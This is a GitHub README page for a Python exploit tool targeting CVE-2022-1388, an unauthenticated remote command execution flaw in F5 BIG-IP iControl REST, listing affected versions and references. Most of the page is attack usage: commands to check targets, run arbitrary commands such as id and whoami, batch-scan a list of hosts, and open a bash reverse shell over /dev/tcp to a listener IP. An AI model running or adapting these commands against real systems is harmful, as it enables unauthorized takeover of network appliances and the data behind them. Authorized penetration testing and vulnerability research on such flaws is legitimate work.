Al1ex / CVE-2022-1388

CVE-2022-1388 F5 BIG-IP iControl REST RCE

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Vuln Impact

This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services.

Vuln Product

  • F5 BIG-IQ 11.6.1 - 11.6.5
  • F5 BIG-IP 12.1.0 - 12.1.6
  • F5 BIG-IP 13.1.0 - 13.1.4
  • F5 BIG-IP 14.1.0 - 14.1.4
  • F5 BIG-IP 15.1.0 - 15.1.5
  • F5 BIG-IP 16.1.0 - 16.1.2

Vunl Check

Basic usage

python3 CVE_2022_1388.py

use

Vuln check

python3 CVE_2022_1388.py -v true -u https://192.168.17.200

verify

command execute:

python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c id

command_exec

python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c whoami

exec_2

batch scan

python3 CVE_2022_1388.py -s true -f check.txt

batch_scan

Reserve Shell

python3 CVE_2022_1388.py -r true -u https://192.168.17.200 -c "bash -i >&/dev/tcp/192.168.17.175/8888 0>&1"

reverse_shell

reverse_shell_ok

Reference

https://support.f5.com/csp/article/K23605346

https://mp.weixin.qq.com/s/OC52LIGB5NTITy9EjvKdaw

https://twitter.com/jas502n/status/1523611433938059265

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388

https://github.com/rancher/rancher/security/advisories/GHSA-pvxj-25m6-7vqr

About

CVE-2022-1388 F5 BIG-IP iControl REST RCE


Languages

Language:Python 100.0%